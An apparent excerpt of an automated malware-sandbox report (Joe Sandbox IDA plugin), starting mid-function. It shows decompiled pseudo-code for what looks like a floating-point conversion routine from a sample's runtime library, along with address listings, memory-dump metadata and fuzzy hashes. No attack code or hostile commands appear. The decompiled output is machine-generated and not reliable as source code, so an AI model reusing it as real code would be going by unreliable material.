									__eflags = _t360;
									if(_t360 != 0) {
										_t361 = _t493 + _t261 * 4 - 0x20;
										_t395 =  *_t361;
										_t121 = _t395 + 1; // 0x2
										_t485 = _t121;
										__eflags = _t485 - _t395;
										if(_t485 < _t395) {
											L58:
											_t434 = 1;
											__eflags = 1;
										} else {
											__eflags = _t485 - 1;
											if(_t485 < 1) {
												goto L58;
											}
										}
										 *_t361 = _t485;
										_t360 = _t434;
										continue;
									}
									goto L61;
								}
							}
							L61:
							 *_t294 =  *_t294 & (_t261 | 0xffffffff) << _v20;
							_t265 = _v16 + 1;
							__eflags = _t265 - 3;
							if(_t265 < 3) {
								_t354 = 3;
								_t438 = _t493 + _t265 * 4 - 0x20;
								_t355 = _t354 - _t265;
								__eflags = 0;
								memset(_t438, 0, _t355 << 2);
								_t434 = _t438 + _t355;
							}
							_t345 =  *0x42cc08; // 0x8
							_t346 = _t345 + 1;
							asm("cdq");
							_t268 = _t346 + (_t395 & 0x0000001f) >> 5;
							_t398 = _t346 & 0x8000001f;
							__eflags = _t398;
							if(_t398 < 0) {
								_t398 = (_t398 - 0x00000001 | 0xffffffe0) + 1;
								__eflags = _t398;
							}
							_v16 = _v16 & 0x00000000;
							_a4 = _a4 & 0x00000000;
							_v8 = 0x20;
							_t133 =  &_v8;
							 *_t133 = _v8 - _t398;
							__eflags =  *_t133;
							_t437 =  !((_t434 | 0xffffffff) << _t398);
							do {
								_t296 = _t493 + _a4 * 4 - 0x20;
								_t475 =  *_t296;
								_v20 = _t475 & _t437;
								 *_t296 = _t475 >> _t398 | _v16;
								_a4 = _a4 + 1;
								__eflags = _a4 - 3;
								_v16 = _v20 << _v8;
							} while (_a4 < 3);
							_t399 = 2;
							_t353 =  &_v28 - (_t268 << 2);
							__eflags = _t353;
							do {
								__eflags = _t399 - _t268;
								if(_t399 < _t268) {
									_t151 = _t493 + _t399 * 4 - 0x20;
									 *_t151 =  *(_t493 + _t399 * 4 - 0x20) & 0x00000000;
									__eflags =  *_t151;
								} else {
									 *(_t493 + _t399 * 4 - 0x20) =  *_t353;
								}
								_t399 = _t399 - 1;
								_t353 = _t353 - 4;
								__eflags = _t399;
							} while (_t399 >= 0);
							goto L72;
						}
					} else {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						L72:
						_t286 = 0;
						_t249 = 2;
					}
				} else {
					_t286 = 0;
					_t281 = 0;
					while( *((intOrPtr*)(_t493 + _t281 * 4 - 0x20)) == _t286) {
						_t281 = _t281 + 1;
						if(_t281 < 3) {
							continue;
						} else {
							_t249 = 0;
						}
						goto L95;
					}
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t249 = 2;
				}
				L95:
				_t317 = 0x1f;
				asm("sbb ecx, ecx");
				_t322 =  *0x42cc0c; // 0x20
				_t289 = _t286 << _t317 -  *0x42cc08 |  ~_v24 & 0x80000000 | _v36;
				if(_t322 == 0x40) {
					_t324 = _a8;
					_t324[2] = _t289;
					 *_t324 = _v32;
					return _t249;
				}
				__eflags = _t322 - 0x20;
				if(_t322 == 0x20) {
					 *_a8 = _t289;
					return _t249;
				}
				return _t249;
			}

0x0041444f
0x00414452
0x0041445f
0x00414465
0x00414474
0x00414484
0x00414487
0x0041448a
0x004144b3
0x004144be
0x004144bf
0x004144c0
0x004144c1
0x004144c7
0x004144c8
0x004144c8
0x004144cd
0x004144d3
0x004144d8
0x004144d8
0x004144de
0x004144e1
0x004144e4
0x004144ea
0x004144ea
0x004144ea
0x004144eb
0x004144f3
0x004144f4
0x004144f7
0x004144f9
0x004144fc
0x004144fe
0x00414504
0x0041450c
0x0041450e
0x00414519
0x0041451b
0x0041451c
0x0041451f
0x00414514
0x00000000
0x00000000
0x00414521
0x00000000
0x0041451f
0x00414525
0x00414528
0x0041452d
0x00414530
0x00414530
0x00414536
0x0041453c
0x0041453c
0x0041453c
0x0041453d
0x00414546
0x00414548
0x00414550
0x00414553
0x00414555
0x00414558
0x0041457c
0x0041457c
0x0041455a
0x0041455a
0x0041457a
0x0041457a
0x00000000
0x00000000
0x0041457a
0x00414583
0x00414583
0x00414583
0x00414584
0x00414587
0x00414589
0x0041458c
0x0041455f
0x00414561
0x00414563
0x00414567
0x0041456d
0x0041456d
0x00414570
0x00414572
0x00414575
0x00000000
0x00414577
0x00414577
0x00000000
0x00414577
0x00000000
0x00414575
0x00414561
0x0041458e
0x0041458e
0x00414591
0x00414599
0x0041459e
0x0041459f
0x004145a2
0x004145a6
0x004145ad
0x004145af
0x004145af
0x004145af
0x004145b1
0x004145b5
0x004145b7
0x004145b7
0x004145b7
0x004145b8
0x004145c5
0x004145c7
0x004145d6
0x004145d8
0x004147ed
0x004147f3
0x004147f9
0x004148ac
0x004148b1
0x004148b8
0x004148bc
0x004148c4
0x004148c7
0x004148c7
0x004148cd
0x004148d3
0x004148d3
0x004148d3
0x004148d4
0x004148d8
0x004148e3
0x004148ea
0x004148ea
0x004148ea
0x004148ed
0x004148ef
0x004148f2
0x004148fa
0x00414907
0x00414913
0x00414916
0x0041491a
0x0041491a
0x00414929
0x0041492a
0x0041492a
0x0041492c
0x0041492c
0x0041492e
0x00414938
0x00414938
0x00414938
0x00414930
0x00414932
0x00414932
0x0041493d
0x0041493e
0x00414941
0x00414941
0x00414945
0x00414945
0x004147ff
0x00414801
0x00414804
0x00414805
0x00414806
0x00414807
0x00414810
0x00414818
0x0041481b
0x0041481b
0x00414821
0x00414827
0x00414827
0x00414827
0x00414828
0x0041482c
0x00414837
0x0041483e
0x0041483e
0x0041483e
0x00414841
0x00414843
0x00414846
0x0041484a
0x00414850
0x0041485d
0x00414864
0x00414867
0x0041486b
0x0041486b
0x0041487a
0x0041487b
0x0041487b
0x0041487d
0x0041487d
0x0041487f
0x00414889
0x00414889
0x00414889
0x00414881
0x00414883
0x00414883
0x0041488e
0x0041488f
0x00414892
0x00414892
0x00414896
0x0041489b
0x004148a1
0x004148a6
0x004148a6
0x004145de
0x004145de
0x004145e6
0x004145e9
0x004145ea
0x004145f0
0x004145f3
0x004145f6
0x004145f6
0x004145fc
0x004145fd
0x00414603
0x00414603
0x00414603
0x00414604
0x00414608
0x00414613
0x0041461a
0x0041461a
0x0041461a
0x0041461d
0x0041461f
0x00414622
0x00414626
0x0041462c
0x00414639
0x00414640
0x00414643
0x00414647
0x00414647
0x00414656
0x00414657
0x00414657
0x00414659
0x00414659
0x0041465b
0x00414665
0x00414665
0x00414665
0x0041465d
0x0041465f
0x0041465f
0x0041466a
0x0041466b
0x0041466e
0x0041466e
0x00414672
0x00414678
0x00414679
0x00414679
0x0041467e
0x00414684
0x00414689
0x00414689
0x0041468f
0x00414692
0x00414698
0x00414698
0x00414698
0x0041469b
0x0041469c
0x004146a1
0x004146a3
0x004146a7
0x004146aa
0x004146ac
0x004146b7
0x004146b9
0x004146c4
0x004146c6
0x004146c7
0x004146ca
0x004146bf
0x00000000
0x00000000
0x004146cc
0x00000000
0x004146ca
0x004146d0
0x004146d3
0x004146d8
0x004146db
0x004146db
0x004146e1
0x004146e7
0x004146e7
0x004146e7
0x004146e8
0x004146f1
0x004146f3
0x004146f7
0x004146f9
0x004146fc
0x004146fe
0x00414704
0x00414704
0x00414700
0x00414700
0x00414702
0x00000000
0x00000000
0x00414702
0x0041470b
0x0041470d
0x00414731
0x00414731
0x00414731
0x00414732
0x00000000
0x00000000
0x00414712
0x00414714
0x00414716
0x0041471a
0x0041471c
0x0041471c
0x00414721
0x00414723
0x0041472a
0x0041472c
0x0041472c
0x00414725
0x00414725
0x00414728
0x00000000
0x00000000
0x00414728
0x0041472d
0x0041472f
0x00000000
0x0041472f
0x00000000
0x00414714
0x00414731
0x00414734
0x0041473c
0x00414741
0x00414742
0x00414745
0x00414749
0x0041474a
0x0041474e
0x00414750
0x00414752
0x00414752
0x00414752
0x00414754
0x0041475a
0x0041475d
0x00414765
0x00414768
0x00414768
0x0041476e
0x00414774
0x00414774
0x00414774
0x00414775
0x00414779
0x00414784
0x0041478b
0x0041478b
0x0041478b
0x0041478e
0x00414790
0x00414793
0x00414797
0x0041479d
0x004147aa
0x004147b1
0x004147b4
0x004147b8
0x004147b8
0x004147c7
0x004147c8
0x004147c8
0x004147ca
0x004147ca
0x004147cc
0x004147d6
0x004147d6
0x004147d6
0x004147ce
0x004147d0
0x004147d0
0x004147db
0x004147dc
0x004147df
0x004147df
0x00000000
0x004147ca
0x004145c9
0x004145ce
0x004145cf
0x004145d0
0x004147e3
0x004147e5
0x004147e7
0x004147e7
0x0041448c
0x0041448c
0x0041448e
0x00414490
0x00414496
0x0041449a
0x00000000
0x0041449c
0x0041449c
0x0041449c
0x00000000
0x0041449a
0x004144a8
0x004144a9
0x004144ac
0x004144ad
0x004144ad
0x00414948
0x0041494a
0x00414958
0x00414962
0x00414968
0x0041496e
0x00414970
0x00414976
0x00414979
0x00000000
0x00414979
0x0041497d
0x00414980
0x00414985
0x00000000
0x00414985
0x0041498a

Strings

, xrefs: 004148E3

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 73dfd7de476dc03c3a0bc7ecec83dd2ee081efb1183e876faf975e9413070d73
Instruction ID: 2d1c1fda648c1f10975837b91237ef28666af25bb28fe1228fba60b4b0f928a2
Opcode Fuzzy Hash: 73dfd7de476dc03c3a0bc7ecec83dd2ee081efb1183e876faf975e9413070d73
Instruction Fuzzy Hash: F402F872E105199BDF08CF68D8403EDB3B2FBD9365F25822ED926A72D0C7746A45CB84

Function 00413F07, Relevance: 1.8, Strings: 1, Instructions: 517
Crypto

C-Code - Quality: 92%

			E00413F07(signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed short _v32;
				signed int _v36;
				void* _v48;
				signed short* _t231;
				signed int _t236;
				signed int _t239;
				signed int _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				signed int _t248;
				void* _t249;
				signed int _t253;
				intOrPtr _t254;
				signed int _t256;
				signed int _t258;
				signed int _t261;
				signed int _t265;
				signed int _t268;
				signed int _t273;
				signed int _t277;
				signed int _t280;
				signed int _t281;
				signed int _t285;
				signed int _t286;
				signed int _t289;
				signed int* _t291;
				signed int* _t293;
				signed int* _t294;
				signed int* _t296;
				signed int _t297;
				signed int _t301;
				void* _t302;
				signed char _t303;
				signed int _t307;
				signed int _t316;
				void* _t317;
				intOrPtr _t322;
				signed short* _t324;
				signed int _t331;
				intOrPtr _t332;
				signed int _t340;
				signed int _t341;
				void* _t342;
				signed char _t343;
				signed int _t345;
				signed int _t346;
				signed int _t353;
				void* _t354;
				signed int _t355;
				signed int _t357;
				signed int* _t359;
				signed int _t360;
				signed int* _t361;
				void* _t362;
				signed int _t365;
				signed int* _t367;
				signed int _t368;
				signed int _t369;
				signed int _t372;
				signed int _t375;
				signed int _t376;
				signed int _t382;
				signed int _t383;
				signed int _t388;
				signed int _t389;
				signed int _t392;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t416;
				signed int* _t421;
				unsigned int _t422;
				signed int _t427;
				signed int _t430;
				signed int _t431;
				signed int _t434;
				signed int _t437;
				void* _t438;
				intOrPtr _t447;
				signed int _t448;
				signed int _t451;
				unsigned int _t456;
				unsigned int _t465;
				intOrPtr _t473;
				signed int _t474;
				unsigned int _t475;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t488;
				void* _t493;
				void* _t494;

				_t231 = _a4;
				_t297 = _t231[5] & 0x0000ffff;
				_v24 = _t297 & 0x00008000;
				_v36 = _t231[3];
				_t285 = (_t297 & 0x00007fff) - 0x3fff;
				_v32 = _t231[1];
				_v28 = ( *_t231 & 0x0000ffff) << 0x10;
				if(_t285 != 0xffffc001) {
					_a4 = _a4 & 0x00000000;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t447 =  *0x42cbec; // 0x35
					_t448 = _t447 - 1;
					_t17 = _t448 + 1; // 0x35
					_t301 = _t17;
					asm("cdq");
					_t236 = _t301 + (_t369 & 0x0000001f) >> 5;
					_t372 = _t301 & 0x8000001f;
					__eflags = _t372;
					_v20 = _t285;
					_v16 = _t236;
					if(_t372 < 0) {
						_t372 = (_t372 - 0x00000001 | 0xffffffe0) + 1;
						__eflags = _t372;
					}
					_t421 = _t493 + _t236 * 4 - 0x20;
					_t302 = 0x1f;
					_t303 = _t302 - _t372;
					_t239 = 1 << _t303;
					_v12 = _t303;
					__eflags =  *_t421 & 1;
					if(( *_t421 & 1) != 0) {
						_t277 = _v16;
						_t372 =  !((_t372 | 0xffffffff) << _t303);
						__eflags =  *(_t493 + _t277 * 4 - 0x20) & _t372;
						while(__eflags == 0) {
							_t277 = _t277 + 1;
							__eflags = _t277 - 3;
							if(_t277 < 3) {
								__eflags =  *(_t493 + _t277 * 4 - 0x20);
								continue;
							} else {
							}
							goto L25;
						}
						asm("cdq");
						_t365 = 0x1f;
						_t280 = _t448 + (_t372 & _t365) >> 5;
						_t488 = _t448 & 0x8000001f;
						__eflags = _t488;
						if(_t488 < 0) {
							_t488 = (_t488 - 0x00000001 | 0xffffffe0) + 1;
							__eflags = _t488;
						}
						_v8 = _v8 & 0x00000000;
						_t416 = 1 << _t365 - _t488;
						_t367 = _t493 + _t280 * 4 - 0x20;
						_a4 =  *_t367 + 1;
						_t448 =  *_t367;
						__eflags = _a4 - _t448;
						if(_a4 < _t448) {
							L22:
							_v8 = 1;
						} else {
							__eflags = _a4 - _t416;
							L21:
							if(__eflags < 0) {
								goto L22;
							}
						}
						L23:
						_t239 = _t280 - 1;
						__eflags = _t239;
						_t372 = _a4;
						 *_t367 = _t372;
						_t368 = _v8;
						if(_t239 >= 0) {
							__eflags = _t368;
							if(_t368 != 0) {
								_v8 = _v8 & 0x00000000;
								_t367 = _t493 + _t239 * 4 - 0x20;
								_t48 =  *_t367 + 1; // 0x1
								_t448 = _t48;
								__eflags = _t448 -  *_t367;
								_a4 = _t448;
								if(_t448 <  *_t367) {
									goto L22;
								} else {
									__eflags = _t448 - 1;
									goto L21;
								}
								goto L23;
							}
						}
						_a4 = _t368;
					}
					L25:
					 *_t421 =  *_t421 & (_t239 | 0xffffffff) << _v12;
					_t243 = _v16 + 1;
					__eflags = _t243 - 3;
					if(_t243 < 3) {
						_t362 = 3;
						__eflags = 0;
						memset(_t493 + _t243 * 4 - 0x20, 0, _t362 - _t243 << 2);
						_t494 = _t494 + 0xc;
					}
					__eflags = _a4;
					if(_a4 != 0) {
						_t285 = _t285 + 1;
						__eflags = _t285;
					}
					_t244 =  *0x42cbe8; // 0xfffffc01
					__eflags = _t285 - _t244 -  *0x42cbec;
					if(_t285 >= _t244 -  *0x42cbec) {
						__eflags = _t285 - _t244;
						if(_t285 > _t244) {
							__eflags = _t285 -  *0x42cbe4; // 0x400
							_t307 =  *0x42cbf0; // 0xb
							if(__eflags < 0) {
								_t245 =  *0x42cbf8; // 0x3ff
								_v36 = _v36 & 0x7fffffff;
								_t286 = _t285 + _t245;
								asm("cdq");
								_t248 = _t307 + (_t372 & 0x0000001f) >> 5;
								_t375 = _t307 & 0x8000001f;
								__eflags = _t375;
								if(_t375 < 0) {
									_t375 = (_t375 - 0x00000001 | 0xffffffe0) + 1;
									__eflags = _t375;
								}
								_v16 = _v16 & 0x00000000;
								_a4 = _a4 & 0x00000000;
								_v8 = 0x20;
								_t197 =  &_v8;
								 *_t197 = _v8 - _t375;
								__eflags =  *_t197;
								_t451 =  !((_t448 | 0xffffffff) << _t375);
								do {
									_t422 =  *(_t493 + _a4 * 4 - 0x20);
									_v20 = _t422 & _t451;
									 *(_t493 + _a4 * 4 - 0x20) = _t422 >> _t375 | _v16;
									_a4 = _a4 + 1;
									__eflags = _a4 - 3;
									_v16 = _v20 << _v8;
								} while (_a4 < 3);
								_t376 = 2;
								_t316 =  &_v28 - (_t248 << 2);
								__eflags = _t316;
								do {
									__eflags = _t376 - _t248;
									if(_t376 < _t248) {
										_t219 = _t493 + _t376 * 4 - 0x20;
										 *_t219 =  *(_t493 + _t376 * 4 - 0x20) & 0x00000000;
										__eflags =  *_t219;
									} else {
										 *(_t493 + _t376 * 4 - 0x20) =  *_t316;
									}
									_t376 = _t376 - 1;
									_t316 = _t316 - 4;
									__eflags = _t376;
								} while (_t376 >= 0);
								_t249 = 0;
								__eflags = 0;
							} else {
								_t427 =  &_v36;
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_v36 = _v36 | 0x80000000;
								asm("cdq");
								_t253 = _t307 + (_t372 & 0x0000001f) >> 5;
								_t382 = _t307 & 0x8000001f;
								__eflags = _t382;
								if(_t382 < 0) {
									_t382 = (_t382 - 0x00000001 | 0xffffffe0) + 1;
									__eflags = _t382;
								}
								_v16 = _v16 & 0x00000000;
								_a4 = _a4 & 0x00000000;
								_v8 = 0x20;
								_t165 =  &_v8;
								 *_t165 = _v8 - _t382;
								__eflags =  *_t165;
								_t430 =  !((_t427 | 0xffffffff) << _t382);
								do {
									_t291 = _t493 + _a4 * 4 - 0x20;
									_t456 =  *_t291;
									_v20 = _t456 & _t430;
									 *_t291 = _t456 >> _t382 | _v16;
									_a4 = _a4 + 1;
									__eflags = _a4 - 3;
									_v16 = _v20 << _v8;
								} while (_a4 < 3);
								_t383 = 2;
								_t331 =  &_v28 - (_t253 << 2);
								__eflags = _t331;
								do {
									__eflags = _t383 - _t253;
									if(_t383 < _t253) {
										_t183 = _t493 + _t383 * 4 - 0x20;
										 *_t183 =  *(_t493 + _t383 * 4 - 0x20) & 0x00000000;
										__eflags =  *_t183;
									} else {
										 *(_t493 + _t383 * 4 - 0x20) =  *_t331;
									}
									_t383 = _t383 - 1;
									_t331 = _t331 - 4;
									__eflags = _t383;
								} while (_t383 >= 0);
								_t254 =  *0x42cbe4; // 0x400
								_t332 =  *0x42cbf8; // 0x3ff
								_t286 = _t332 + _t254;
								_t249 = 1;
							}
						} else {
							_t256 = _t244 - _v20;
							_t431 =  &_v36;
							asm("movsd");
							asm("cdq");
							asm("movsd");
							_t258 = _t256 + (_t372 & 0x0000001f) >> 5;
							_t388 = _t256 & 0x8000001f;
							__eflags = _t388;
							asm("movsd");
							if(_t388 < 0) {
								_t388 = (_t388 - 0x00000001 | 0xffffffe0) + 1;
								__eflags = _t388;
							}
							_v16 = _v16 & 0x00000000;
							_a4 = _a4 & 0x00000000;
							_v8 = 0x20;
							_t70 =  &_v8;
							 *_t70 = _v8 - _t388;
							__eflags =  *_t70;
							_t434 =  !((_t431 | 0xffffffff) << _t388);
							do {
								_t293 = _t493 + _a4 * 4 - 0x20;
								_t465 =  *_t293;
								_v20 = _t465 & _t434;
								 *_t293 = _t465 >> _t388 | _v16;
								_a4 = _a4 + 1;
								__eflags = _a4 - 3;
								_v16 = _v20 << _v8;
							} while (_a4 < 3);
							_t389 = 2;
							_t340 =  &_v28 - (_t258 << 2);
							__eflags = _t340;
							do {
								__eflags = _t389 - _t258;
								if(_t389 < _t258) {
									_t88 = _t493 + _t389 * 4 - 0x20;
									 *_t88 =  *(_t493 + _t389 * 4 - 0x20) & 0x00000000;
									__eflags =  *_t88;
								} else {
									 *(_t493 + _t389 * 4 - 0x20) =  *_t340;
								}
								_t389 = _t389 - 1;
								_t340 = _t340 - 4;
								__eflags = _t389;
							} while (_t389 >= 0);
							_t473 =  *0x42cbec; // 0x35
							_t474 = _t473 - 1;
							_t94 = _t474 + 1; // 0x35
							_t341 = _t94;
							asm("cdq");
							_t261 = _t341 + (_t389 & 0x0000001f) >> 5;
							_t392 = _t341 & 0x8000001f;
							__eflags = _t392;
							_v16 = _t261;
							if(_t392 < 0) {
								_t392 = (_t392 - 0x00000001 | 0xffffffe0) + 1;
								__eflags = _t392;
							}
							_t342 = 0x1f;
							_t343 = _t342 - _t392;
							_t395 = 1 << _t343;
							_t294 = _t493 + _t261 * 4 - 0x20;
							_v20 = _t343;
							__eflags =  *_t294 & 1;
							if(( *_t294 & 1) != 0) {
								_t395 =  !((_t395 | 0xffffffff) << _t343);
								__eflags =  *(_t493 + _t261 * 4 - 0x20) & 1;
								while(__eflags == 0) {
									_t261 = _t261 + 1;
									__eflags = _t261 - 3;
									if(_t261 < 3) {
										__eflags =  *(_t493 + _t261 * 4 - 0x20);
										continue;
									} else {
									}
									goto L61;
								}
								asm("cdq");
								_t357 = 0x1f;
								_t273 = _t474 + (_t395 & _t357) >> 5;
								_t483 = _t474 & 0x8000001f;
								__eflags = _t483;
								if(_t483 < 0) {
									_t483 = (_t483 - 0x00000001 | 0xffffffe0) + 1;
									__eflags = _t483;
								}
								_a4 = _a4 & 0x00000000;
								_t395 = 1 << _t357 - _t483;
								_t359 = _t493 + _t273 * 4 - 0x20;
								_t484 =  *_t359;
								_t434 = _t484 + 1;
								__eflags = _t434 - _t484;
								if(_t434 < _t484) {
									L53:
									_a4 = 1;
								} else {
									__eflags = _t434 - 1;
									if(_t434 < 1) {
										goto L53;
									}
								}
								 *_t359 = _t434;
								_t360 = _a4;
								while(1) {
									_t261 = _t273 - 1;
									__eflags = _t261;
									if(_t261 < 0) {
										goto L61;
									}
									__eflags = _t360;
									if(_t360 != 0) {
										_t361 = _t493 + _t261 * 4 - 0x20;
										_t395 =  *_t361;
										_t121 = _t395 + 1; // 0x2
										_t485 = _t121;
										__eflags = _t485 - _t395;
										if(_t485 < _t395) {
											L58:
											_t434 = 1;
											__eflags = 1;
										} else {
											__eflags = _t485 - 1;
											if(_t485 < 1) {
												goto L58;
											}
										}
										 *_t361 = _t485;
										_t360 = _t434;
										continue;
									}
									goto L61;
								}
							}
							L61:
							 *_t294 =  *_t294 & (_t261 | 0xffffffff) << _v20;
							_t265 = _v16 + 1;
							__eflags = _t265 - 3;
							if(_t265 < 3) {
								_t354 = 3;
								_t438 = _t493 + _t265 * 4 - 0x20;
								_t355 = _t354 - _t265;
								__eflags = 0;
								memset(_t438, 0, _t355 << 2);
								_t434 = _t438 + _t355;
							}
							_t345 =  *0x42cbf0; // 0xb
							_t346 = _t345 + 1;
							asm("cdq");
							_t268 = _t346 + (_t395 & 0x0000001f) >> 5;
							_t398 = _t346 & 0x8000001f;
							__eflags = _t398;
							if(_t398 < 0) {
								_t398 = (_t398 - 0x00000001 | 0xffffffe0) + 1;
								__eflags = _t398;
							}
							_v16 = _v16 & 0x00000000;
							_a4 = _a4 & 0x00000000;
							_v8 = 0x20;
							_t133 =  &_v8;
							 *_t133 = _v8 - _t398;
							__eflags =  *_t133;
							_t437 =  !((_t434 | 0xffffffff) << _t398);
							do {
								_t296 = _t493 + _a4 * 4 - 0x20;
								_t475 =  *_t296;
								_v20 = _t475 & _t437;
								 *_t296 = _t475 >> _t398 | _v16;
								_a4 = _a4 + 1;
								__eflags = _a4 - 3;
								_v16 = _v20 << _v8;
							} while (_a4 < 3);
							_t399 = 2;
							_t353 =  &_v28 - (_t268 << 2);
							__eflags = _t353;
							do {
								__eflags = _t399 - _t268;
								if(_t399 < _t268) {
									_t151 = _t493 + _t399 * 4 - 0x20;
									 *_t151 =  *(_t493 + _t399 * 4 - 0x20) & 0x00000000;
									__eflags =  *_t151;
								} else {
									 *(_t493 + _t399 * 4 - 0x20) =  *_t353;
								}
								_t399 = _t399 - 1;
								_t353 = _t353 - 4;
								__eflags = _t399;
							} while (_t399 >= 0);
							goto L72;
						}
					} else {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						L72:
						_t286 = 0;
						_t249 = 2;
					}
				} else {
					_t286 = 0;
					_t281 = 0;
					while( *((intOrPtr*)(_t493 + _t281 * 4 - 0x20)) == _t286) {
						_t281 = _t281 + 1;
						if(_t281 < 3) {
							continue;
						} else {
							_t249 = 0;
						}
						goto L95;
					}
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t249 = 2;
				}
				L95:
				_t317 = 0x1f;
				asm("sbb ecx, ecx");
				_t322 =  *0x42cbf4; // 0x40
				_t289 = _t286 << _t317 -  *0x42cbf0 |  ~_v24 & 0x80000000 | _v36;
				if(_t322 == 0x40) {
					_t324 = _a8;
					_t324[2] = _t289;
					 *_t324 = _v32;
					return _t249;
				}
				__eflags = _t322 - 0x20;
				if(_t322 == 0x20) {
					 *_a8 = _t289;
					return _t249;
				}
				return _t249;
			}

0x00413f0d
0x00413f10
0x00413f1d
0x00413f23
0x00413f32
0x00413f42
0x00413f45
0x00413f48
0x00413f71
0x00413f7c
0x00413f7d
0x00413f7e
0x00413f7f
0x00413f85
0x00413f86
0x00413f86
0x00413f8b
0x00413f91
0x00413f96
0x00413f96
0x00413f9c
0x00413f9f
0x00413fa2
0x00413fa8
0x00413fa8
0x00413fa8
0x00413fa9
0x00413fb1
0x00413fb2
0x00413fb5
0x00413fb7
0x00413fba
0x00413fbc
0x00413fc2
0x00413fca
0x00413fcc
0x00413fd7
0x00413fd9
0x00413fda
0x00413fdd
0x00413fd2
0x00000000
0x00000000
0x00413fdf
0x00000000
0x00413fdd
0x00413fe3
0x00413fe6
0x00413feb
0x00413fee
0x00413fee
0x00413ff4
0x00413ffa
0x00413ffa
0x00413ffa
0x00413ffb
0x00414004
0x00414006
0x0041400e
0x00414011
0x00414013
0x00414016
0x0041403a
0x0041403a
0x00414018
0x00414018
0x00414038
0x00414038
0x00000000
0x00000000
0x00414038
0x00414041
0x00414041
0x00414041
0x00414042
0x00414045
0x00414047
0x0041404a
0x0041401d
0x0041401f
0x00414021
0x00414025
0x0041402b
0x0041402b
0x0041402e
0x00414030
0x00414033
0x00000000
0x00414035
0x00414035
0x00000000
0x00414035
0x00000000
0x00414033
0x0041401f
0x0041404c
0x0041404c
0x0041404f
0x00414057
0x0041405c
0x0041405d
0x00414060
0x00414064
0x0041406b
0x0041406d
0x0041406d
0x0041406d
0x0041406f
0x00414073
0x00414075
0x00414075
0x00414075
0x00414076
0x00414083
0x00414085
0x00414094
0x00414096
0x004142ab
0x004142b1
0x004142b7
0x0041436a
0x0041436f
0x00414376
0x0041437a
0x00414382
0x00414385
0x00414385
0x0041438b
0x00414391
0x00414391
0x00414391
0x00414392
0x00414396
0x004143a1
0x004143a8
0x004143a8
0x004143a8
0x004143ab
0x004143ad
0x004143b0
0x004143b8
0x004143c5
0x004143d1
0x004143d4
0x004143d8
0x004143d8
0x004143e7
0x004143e8
0x004143e8
0x004143ea
0x004143ea
0x004143ec
0x004143f6
0x004143f6
0x004143f6
0x004143ee
0x004143f0
0x004143f0
0x004143fb
0x004143fc
0x004143ff
0x004143ff
0x00414403
0x00414403
0x004142bd
0x004142bf
0x004142c2
0x004142c3
0x004142c4
0x004142c5
0x004142ce
0x004142d6
0x004142d9
0x004142d9
0x004142df
0x004142e5
0x004142e5
0x004142e5
0x004142e6
0x004142ea
0x004142f5
0x004142fc
0x004142fc
0x004142fc
0x004142ff
0x00414301
0x00414304
0x00414308
0x0041430e
0x0041431b
0x00414322
0x00414325
0x00414329
0x00414329
0x00414338
0x00414339
0x00414339
0x0041433b
0x0041433b
0x0041433d
0x00414347
0x00414347
0x00414347
0x0041433f
0x00414341
0x00414341
0x0041434c
0x0041434d
0x00414350
0x00414350
0x00414354
0x00414359
0x0041435f
0x00414364
0x00414364
0x0041409c
0x0041409c
0x004140a4
0x004140a7
0x004140a8
0x004140ae
0x004140b1
0x004140b4
0x004140b4
0x004140ba
0x004140bb
0x004140c1
0x004140c1
0x004140c1
0x004140c2
0x004140c6
0x004140d1
0x004140d8
0x004140d8
0x004140d8
0x004140db
0x004140dd
0x004140e0
0x004140e4
0x004140ea
0x004140f7
0x004140fe
0x00414101
0x00414105
0x00414105
0x00414114
0x00414115
0x00414115
0x00414117
0x00414117
0x00414119
0x00414123
0x00414123
0x00414123
0x0041411b
0x0041411d
0x0041411d
0x00414128
0x00414129
0x0041412c
0x0041412c
0x00414130
0x00414136
0x00414137
0x00414137
0x0041413c
0x00414142
0x00414147
0x00414147
0x0041414d
0x00414150
0x00414156
0x00414156
0x00414156
0x00414159
0x0041415a
0x0041415f
0x00414161
0x00414165
0x00414168
0x0041416a
0x00414175
0x00414177
0x00414182
0x00414184
0x00414185
0x00414188
0x0041417d
0x00000000
0x00000000
0x0041418a
0x00000000
0x00414188
0x0041418e
0x00414191
0x00414196
0x00414199
0x00414199
0x0041419f
0x004141a5
0x004141a5
0x004141a5
0x004141a6
0x004141af
0x004141b1
0x004141b5
0x004141b7
0x004141ba
0x004141bc
0x004141c2
0x004141c2
0x004141be
0x004141be
0x004141c0
0x00000000
0x00000000
0x004141c0
0x004141c9
0x004141cb
0x004141ef
0x004141ef
0x004141ef
0x004141f0
0x00000000
0x00000000
0x004141d0
0x004141d2
0x004141d4
0x004141d8
0x004141da
0x004141da
0x004141df
0x004141e1
0x004141e8
0x004141ea
0x004141ea
0x004141e3
0x004141e3
0x004141e6
0x00000000
0x00000000
0x004141e6
0x004141eb
0x004141ed
0x00000000
0x004141ed
0x00000000
0x004141d2
0x004141ef
0x004141f2
0x004141fa
0x004141ff
0x00414200
0x00414203
0x00414207
0x00414208
0x0041420c
0x0041420e
0x00414210
0x00414210
0x00414210
0x00414212
0x00414218
0x0041421b
0x00414223
0x00414226
0x00414226
0x0041422c
0x00414232
0x00414232
0x00414232
0x00414233
0x00414237
0x00414242
0x00414249
0x00414249
0x00414249
0x0041424c
0x0041424e
0x00414251
